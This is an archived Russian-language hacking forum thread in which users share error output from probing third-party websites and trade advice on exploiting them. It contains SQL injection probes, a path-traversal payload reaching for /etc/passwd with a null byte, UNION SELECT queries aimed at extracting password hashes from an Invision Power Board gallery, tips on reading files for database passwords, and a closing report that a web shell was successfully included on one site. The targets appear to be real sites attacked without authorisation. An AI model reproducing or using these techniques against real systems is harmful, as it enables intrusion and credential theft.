PDA

Просмотр полной версии : Помощь по SQL & PHP

Lorix
07.12.2006, 14:17
В общем если такие ошибки возможен ли тут sql иньекция ?

1,
ndex.php?ID=-1'1699&CATEGORY=0-N-1'ews

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/sfl1/domains/2uk/public_html/story2.php on line 12

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in
/home/sfl1/domains/2uk/public_html/story2.php on line 17

*******************************************
2,

ain.php?pid=?Qalias=x%0a/bin/ls%20/

Warning: main(pages/?Qalias=x /bin/ls /.php): failed to open stream: No such file or directory in /var/www/clients/jus/main.php on line 97

Warning: main(): Failed opening 'pages/?Qalias=x /bin/ls /.php' for inclusion (include_path='.:/usr/share/pear') in /var/www/clients/just/main.php on line 97

********************************************

3,

/index.htm?id=-1'2518
Fatal error: Call to undefined method DB_Error::fetchInto() in /var/www/html/core/lib/classes/GO_DbObj.php on line 536
********************************************
?_m=news&_a=viewnews&newsid=-1'
Fatal error: Invalid News Item in /home/wwwdkho/public_html/support/modules/news/client_news.php on line 102
*********************************
4.


ndex.php?id='company/services


Warning: main(content/\'company/services.txt) [function.main]: failed to open stream: No such file or directory in /home/wav/public_html/index.php on line 186

Warning: main(content/\'company/services.txt) [function.main]: failed to open stream: No such file or directory in /home/wav/public_html/index.php on line 186



******************************************
И напоследок вот такое

/index.php?id_page=-1

При значение -1
Некаких ошибок нету. Просто Появлятеся белая страница ( инечегона ней нету)

**********************************
Rebz
07.12.2006, 14:23
1. возможно sql-inj. По крайне мере раскрытие серверного пути на лицо :)
2. возможно php-incude. Эххх.. попробовал бы %00, ain.php?pid=php-include вроде так.
3. вряд ли скуль.. просто ошибка в обработке данных. Но также во втором случае не исключена возможность sql-inj.
4. чистой воды локальный инклуд. Пробуй отсечь расширения - %00

про "напоследок".. это просто реакция такая на "плохой" параметр...скуль возможна.
Lorix
07.12.2006, 14:33
Сенк. Сейчас буду пробывать
EXSlim
07.12.2006, 14:35
2. возможно php-incude. Эххх.. попробовал бы %00, ain.php?pid=php-include вроде так.

только локальный инклюд из /pages. %00 уместен.

3. Вызов неопределенного метода класса. При возможности глянуть на сам класс GO_DbObj.php
Lorix
07.12.2006, 14:43
А где можно поподробнее почитать про локальные инклюды?

Чтото инфы я так и ненашёл. а по мускульным инклюдам врое достаточно
Lorix
07.12.2006, 14:51
Во вотором примере пробывал вот так

main.php?pid=?../../../../../../../etc/passwd%00

Warning: main(pages/?../../../../../../../etc/passwd\0.php): failed to open stream: No such file or directory in /var/www/clients/juааlar/main.php on line 97
Rebz
07.12.2006, 15:05
значит %00 отпадает.. во-первых, убери вопросительный знак -) а во вторых пробуй разные пхп-файлы втсавлять без расширения пхп.. без ссылки сложно судить.. может даже там ниче и нет интересного
Lorix
07.12.2006, 15:28
значит %00 отпадает.. во-первых, убери вопросительный знак -) а во вторых пробуй разные пхп-файлы втсавлять без расширения пхп.. без ссылки сложно судить.. может даже там ниче и нет интересного


Можеш плиз в аську стукнутся 491104
m0nzt3r
07.12.2006, 15:42
main(pages/
можно инклудить токо то что в папке pages/
VampiRUS
07.12.2006, 16:26
про локальные инклуды можешь почитать здесь http://forum.antichat.ru/threadnav22832-1-10.html
в 4 случае ты можешь просмотреть services.txt, вероятнее всего там php код. возможно там есть ошибки или пароли к бд.
Macro
07.12.2006, 16:35
А как считать converge_members_pass и converge_pass_salt из БД (я нашел скуль в invision gallery 2.0.4) ??? Когда ввожу в адрес вот так: site/forum/index.php?act=module&%20%20module=gallery&cmd=slideshow&show=1,%201%20UNION%20SELECT%20converge_pass_hash% 20FROM%20ipbf_members%20LIMIT%201

То выдает ошибку : mySQL query error: SELECT i.file_type, i.masked_file_name, i.caption, i.id, i.directory, m.name, m.id AS mid
FROM ipbf_gallery_images i, ipbf_members m
WHERE album_id=0 AND m.id=i.member_id
ORDER BY date DESC
LIMIT 1, 1 UNION SELECT converge_pass_hash FROM ipbf_members LIMIT 1, 1

SQL error: Incorrect usage of UNION and ORDER BY
vmn
07.12.2006, 17:16
Не совпадает количество столбцов до юнион и после, кроме того возможно после order by нельзя употреблять union. В любом случае есть возможность посимвольного перебора.
Macro
07.12.2006, 18:22
Не совпадает количество столбцов до юнион и после, кроме того возможно после order by нельзя употреблять union. В любом случае есть возможность посимвольного перебора.
Спасибо! Но это мне не поможет :)
Я вот еще нашел, но тут тоже не врубаюсь.

http:/site/forum/index.php?act=module&module=gallery&cmd=si&img=207%20UNION%20SELECT%201,2,3,4,converge_pass_h ash%20FROM%20ipbf_members_converge

И соответственно:
mySQL query error: SELECT id, caption, masked_file_name, directory, media, thumbnail FROM ipbf_gallery_images WHERE album_id=3 AND id > 207 UNION SELECT 1,2,3,4,converge_pass_hash FROM ipbf_members_converge ORDER BY id ASC LIMIT 0,2

SQL error: The used SELECT statements have a different number of columns

Не поможешь?(уже нашел)


Так. Я нашел число столбцов точно, теперь выдает страницу с картинкой. Но почему-то не дает мне хэшей.
Lorix
07.12.2006, 20:12
Огромнеейшее спасибо Хатабычюю ака }{0tt@БЬ)Ч

Что помог мне заинклюдить шелл =),

+5 так сказать =).
}{0TT@БЬ)Ч
07.12.2006, 20:14
возможно php-incude. Эххх.. попробовал бы %00, ain.php?pid=php-include вроде так.
Глобальный инклуд там и даже нулевой байт не нужен.
m0nzt3r
07.12.2006, 20:34
Глобальный инклуд там
Мда.Закрыто, раз все сделано.